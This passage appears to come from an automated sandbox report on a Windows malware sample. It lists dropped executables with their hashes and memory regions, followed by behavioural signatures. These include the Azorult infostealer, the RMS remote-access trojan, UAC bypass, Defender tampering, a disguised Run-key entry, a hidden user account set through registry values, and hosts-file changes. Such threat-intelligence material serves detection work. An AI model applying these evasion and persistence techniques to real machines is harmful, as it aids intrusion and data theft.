C:\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

memory/1768-119-0x0000000000000000-mapping.dmp

memory/1104-122-0x0000000000000000-mapping.dmp

memory/1708-123-0x0000000000000000-mapping.dmp

memory/1768-124-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1768-125-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1768-126-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1768-127-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1768-128-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/288-129-0x0000000000000000-mapping.dmp

memory/1064-130-0x0000000000000000-mapping.dmp

memory/1572-131-0x0000000000000000-mapping.dmp

memory/1768-132-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1908-133-0x0000000000000000-mapping.dmp

memory/1628-134-0x0000000000000000-mapping.dmp

memory/436-135-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

memory/1476-138-0x0000000000000000-mapping.dmp

memory/436-139-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/436-140-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/436-141-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/436-143-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1944-142-0x0000000000000000-mapping.dmp

memory/436-144-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1664-145-0x0000000000000000-mapping.dmp

memory/1344-146-0x0000000000000000-mapping.dmp

memory/436-148-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/944-147-0x0000000000000000-mapping.dmp

memory/1968-149-0x0000000000000000-mapping.dmp

memory/880-153-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

memory/1968-155-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1968-156-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1968-157-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1968-158-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1372-159-0x0000000000000000-mapping.dmp

memory/1712-160-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

memory/1968-154-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1448-150-0x0000000000000000-mapping.dmp

memory/1188-163-0x0000000000000000-mapping.dmp

memory/1064-164-0x0000000000000000-mapping.dmp

memory/1220-165-0x0000000000000000-mapping.dmp

memory/1496-166-0x0000000000000000-mapping.dmp

memory/996-167-0x0000000000000000-mapping.dmp

memory/1872-168-0x0000000000000000-mapping.dmp

memory/1628-169-0x0000000000000000-mapping.dmp

memory/1164-170-0x0000000000000000-mapping.dmp

memory/640-171-0x0000000000000000-mapping.dmp

memory/1740-172-0x0000000000000000-mapping.dmp

memory/944-175-0x0000000000000000-mapping.dmp

memory/884-174-0x0000000000000000-mapping.dmp

memory/1832-173-0x0000000000000000-mapping.dmp

memory/880-177-0x0000000000000000-mapping.dmp

memory/1120-176-0x0000000000000000-mapping.dmp

memory/1976-178-0x0000000000000000-mapping.dmp

C:\programdata\microsoft\intel\R8.exe

MD5 ad95d98c04a3c080df33ed75ad38870f
SHA1 abbb43f7b7c86d7917d4582e47245a40ca3f33c0
SHA256 40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd
SHA512 964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

\ProgramData\Microsoft\Intel\R8.exe

MD5 ad95d98c04a3c080df33ed75ad38870f
SHA1 abbb43f7b7c86d7917d4582e47245a40ca3f33c0
SHA256 40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd
SHA512 964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

memory/1712-181-0x0000000000000000-mapping.dmp

memory/1776-182-0x0000000000000000-mapping.dmp

C:\ProgramData\Microsoft\Intel\R8.exe

MD5 ad95d98c04a3c080df33ed75ad38870f
SHA1 abbb43f7b7c86d7917d4582e47245a40ca3f33c0
SHA256 40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd
SHA512 964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

memory/1992-185-0x0000000000000000-mapping.dmp

memory/1908-186-0x0000000000000000-mapping.dmp

C:\rdp\run.vbs

MD5 6a5f5a48072a1adae96d2bd88848dcff
SHA1 b381fa864db6c521cbf1133a68acf1db4baa7005
SHA256 c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe
SHA512 d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c

C:\rdp\pause.bat

MD5 a47b870196f7f1864ef7aa5779c54042
SHA1 dcb71b3e543cbd130a9ec47d4f847899d929b3d2
SHA256 46565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba
SHA512 b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60

memory/1600-190-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1600-191-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1600-192-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1600-193-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1600-194-0x0000000000400000-0x0000000000AB9000-memory.dmp

C:\ProgramData\Microsoft\Intel\winlog.exe

MD5 4b2dbc48d42245ef50b975a7831e071c
SHA1 3aab9b62004f14171d1f018cf74d2a804d74ef80
SHA256 54eda5cc37afb3b725fa2078941b3b93b6aec7b8c61cd83b9b2580263ce54724
SHA512 f563e9c6bc521c02490fe66df6cc836e57ec007377efb72259f4a3ae4eb08c4fd43720322982fb211cf8d429874c8795c1a7903cdb79ad92b5174ec5c94533dd

\ProgramData\Microsoft\Intel\winlog.exe

MD5 4b2dbc48d42245ef50b975a7831e071c
SHA1 3aab9b62004f14171d1f018cf74d2a804d74ef80
SHA256 54eda5cc37afb3b725fa2078941b3b93b6aec7b8c61cd83b9b2580263ce54724
SHA512 f563e9c6bc521c02490fe66df6cc836e57ec007377efb72259f4a3ae4eb08c4fd43720322982fb211cf8d429874c8795c1a7903cdb79ad92b5174ec5c94533dd

C:\ProgramData\Microsoft\Intel\winlog.exe

MD5 4b2dbc48d42245ef50b975a7831e071c
SHA1 3aab9b62004f14171d1f018cf74d2a804d74ef80
SHA256 54eda5cc37afb3b725fa2078941b3b93b6aec7b8c61cd83b9b2580263ce54724
SHA512 f563e9c6bc521c02490fe66df6cc836e57ec007377efb72259f4a3ae4eb08c4fd43720322982fb211cf8d429874c8795c1a7903cdb79ad92b5174ec5c94533dd

\ProgramData\Microsoft\Intel\winlogon.exe

MD5 2f6a1bffbff81e7c69d8aa7392175a72
SHA1 94ac919d2a20aa16156b66ed1c266941696077da
SHA256 dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de
SHA512 ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

\ProgramData\Microsoft\Intel\winlogon.exe

MD5 2f6a1bffbff81e7c69d8aa7392175a72
SHA1 94ac919d2a20aa16156b66ed1c266941696077da
SHA256 dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de
SHA512 ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

\ProgramData\Microsoft\Intel\winlogon.exe

MD5 2f6a1bffbff81e7c69d8aa7392175a72
SHA1 94ac919d2a20aa16156b66ed1c266941696077da
SHA256 dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de
SHA512 ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

C:\ProgramData\Microsoft\Intel\winlogon.exe

MD5 2f6a1bffbff81e7c69d8aa7392175a72
SHA1 94ac919d2a20aa16156b66ed1c266941696077da
SHA256 dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de
SHA512 ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

C:\ProgramData\Windows\vp8decoder.dll

MD5 88318158527985702f61d169434a4940
SHA1 3cc751ba256b5727eb0713aad6f554ff1e7bca57
SHA256 4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74
SHA512 5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

C:\ProgramData\Windows\rfusclient.exe

MD5 b8667a1e84567fcf7821bcefb6a444af
SHA1 9c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256 dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512 ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

C:\ProgramData\Windows\vp8encoder.dll

MD5 6298c0af3d1d563834a218a9cc9f54bd
SHA1 0185cd591e454ed072e5a5077b25c612f6849dc9
SHA256 81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172
SHA512 389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

C:\Users\Admin\AppData\Local\Temp\FF94.tmp\FF95.bat

MD5 cfc53d3f9b3716accf268c899f1b0ecb
SHA1 75b9ae89be46a54ed2606de8d328f81173180b2c
SHA256 f293caa096cc51a511cedd76fd011a275fb8a30b6a93542ded718930a7d12ee9
SHA512 0c090e2ed2f3f7b2c00cbb6583df5723a3d0781738eafc37b2e630f46b5b470a5a7dbc44a2f2e8d043f83c753ddf5f72b1d67c0a7e73241e47cd24c92b4ce7d4

memory/1080-208-0x000007FEFBB71000-0x000007FEFBB73000-memory.dmp

\ProgramData\Windows\rfusclient.exe

MD5 b8667a1e84567fcf7821bcefb6a444af
SHA1 9c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256 dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512 ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

\ProgramData\Windows\rfusclient.exe

MD5 b8667a1e84567fcf7821bcefb6a444af
SHA1 9c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256 dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512 ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

C:\ProgramData\Windows\rfusclient.exe

MD5 b8667a1e84567fcf7821bcefb6a444af
SHA1 9c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256 dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512 ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

C:\ProgramData\Windows\rfusclient.exe

MD5 b8667a1e84567fcf7821bcefb6a444af
SHA1 9c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256 dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512 ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

memory/1944-217-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/1204-216-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/1204-218-0x0000000000400000-0x00000000009B6000-memory.dmp

C:\ProgramData\RealtekHD\taskhostw.exe

MD5 639a6e9e1949265f493c1a3505bc3430
SHA1 416384c79557c0a2d1e56e9449ac04d71c9f3477
SHA256 a0bb963a090b975d79786265a0f5fe6b61b8bfcc1bc623559b64b1b9939897fd
SHA512 57400dc5e6e3dbb12cca0141f316b385f1705efd154f6dbfcdc5a109c26ca8e1138c94a46c2811d14e85468d5acc9a4422c0d4e07e9d78fa6a69aeaccf733cb7

memory/1968-221-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1944-219-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/1204-220-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/1944-224-0x0000000000400000-0x00000000009B6000-memory.dmp

\ProgramData\RealtekHD\taskhostw.exe

MD5 639a6e9e1949265f493c1a3505bc3430
SHA1 416384c79557c0a2d1e56e9449ac04d71c9f3477
SHA256 a0bb963a090b975d79786265a0f5fe6b61b8bfcc1bc623559b64b1b9939897fd
SHA512 57400dc5e6e3dbb12cca0141f316b385f1705efd154f6dbfcdc5a109c26ca8e1138c94a46c2811d14e85468d5acc9a4422c0d4e07e9d78fa6a69aeaccf733cb7

memory/1204-225-0x0000000000400000-0x00000000009B6000-memory.dmp

C:\Programdata\RealtekHD\taskhostw.exe

MD5 639a6e9e1949265f493c1a3505bc3430
SHA1 416384c79557c0a2d1e56e9449ac04d71c9f3477
SHA256 a0bb963a090b975d79786265a0f5fe6b61b8bfcc1bc623559b64b1b9939897fd
SHA512 57400dc5e6e3dbb12cca0141f316b385f1705efd154f6dbfcdc5a109c26ca8e1138c94a46c2811d14e85468d5acc9a4422c0d4e07e9d78fa6a69aeaccf733cb7

memory/1944-228-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/1204-229-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/1944-230-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/1080-209-0x000007FEF37F0000-0x000007FEF4213000-memory.dmp

memory/1080-239-0x00000000025C4000-0x00000000025C7000-memory.dmp

C:\programdata\microsoft\temp\H.bat

MD5 76303bb3bb0faa707000df998d8c9f3d
SHA1 5b25444c92c7625e1ca77ed2eb1b4ba6877ba066
SHA256 a33af2b70ad8fea8900b6bd31ac7b0aab8a2b8b79e3e27adafbd34bdfcb67549
SHA512 25e34a1c1507d96e3a9a9722370ee98c85c900329ea74054783cd486a384f088bfe49e6662aa7eb3fc6db58a0178eb8a8851e13b608831bdd828830b8fdf981c

C:\ProgramData\WindowsTask\winlogon.exe

MD5 ec0f9398d8017767f86a4d0e74225506
SHA1 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512 d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

C:\Programdata\WindowsTask\winlogon.exe

MD5 ec0f9398d8017767f86a4d0e74225506
SHA1 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512 d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

C:\ProgramData\microsoft\Temp\5.xml

MD5 487497f0faaccbf26056d9470eb3eced
SHA1 e1be3341f60cfed1521a2cabc5d04c1feae61707
SHA256 9a8efbd09c9cc1ee7e8ff76ea60846b5cd5a47cdaae8e92331f3b7b6a5db4be5
SHA512 3c6b5b29c0d56cfd4b717a964fac276804be95722d78219e7087c4ec787566f223e24421e0e3e2d8a6df5f9c9a5c07f1935f4ba7a83a6a3efa84866e2c1405dd

C:\programdata\microsoft\temp\Temp.bat

MD5 9380f21201174ac1267aa944e1096955
SHA1 e97bd59509694d057daaf698a933092f804fe2e3
SHA256 ccf47d036ccfe0c8d0fe2854d14ca21d99be5fa11d0fbb16edcc1d6c10de3512
SHA512 ff4d2172c75a90b1af183fddc483d7a6d908593cb47009f37818066dee021bf7172b8890502fb26d248d39479c6276dce120b570e31f43fcc616db4b43c67e27

C:\rdp\Rar.exe

MD5 2e86a9862257a0cf723ceef3868a1a12
SHA1 a4324281823f0800132bf13f5ad3860e6b5532c6
SHA256 2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8
SHA512 3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de

\rdp\Rar.exe

MD5 2e86a9862257a0cf723ceef3868a1a12
SHA1 a4324281823f0800132bf13f5ad3860e6b5532c6
SHA256 2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8
SHA512 3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de

memory/1080-264-0x00000000025CB000-0x00000000025EA000-memory.dmp

memory/1440-272-0x0000000000400000-0x00000000009B6000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-05-16 19:23

Reported

2022-05-16 19:33

Platform

win10v2004-20220414-en

Max time kernel

150s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe"

Signatures

Azorult

trojan infostealer azorult

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies visiblity of hidden/system files in Explorer

evasion

RMS

trojan rat rms

UAC bypass

evasion trojan

Windows security bypass

evasion trojan

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Grants admin privileges

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocks application from running via registry modification

evasion

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\SysWOW64\cmd.exe N/A

Modifies Windows Firewall

evasion

Sets DLL path for service in the registry

persistence

Sets file to hidden

evasion

Stops running service(s)

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation C:\programdata\install\cheat.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation C:\ProgramData\Microsoft\Intel\winlogon.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation C:\ProgramData\Microsoft\Intel\winlog.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation C:\ProgramData\Microsoft\Intel\wini.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation C:\programdata\microsoft\intel\R8.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\System32\svchost.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run C:\Programdata\RealtekHD\taskhostw.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" C:\Programdata\RealtekHD\taskhostw.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" C:\rdp\RDPWInst.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
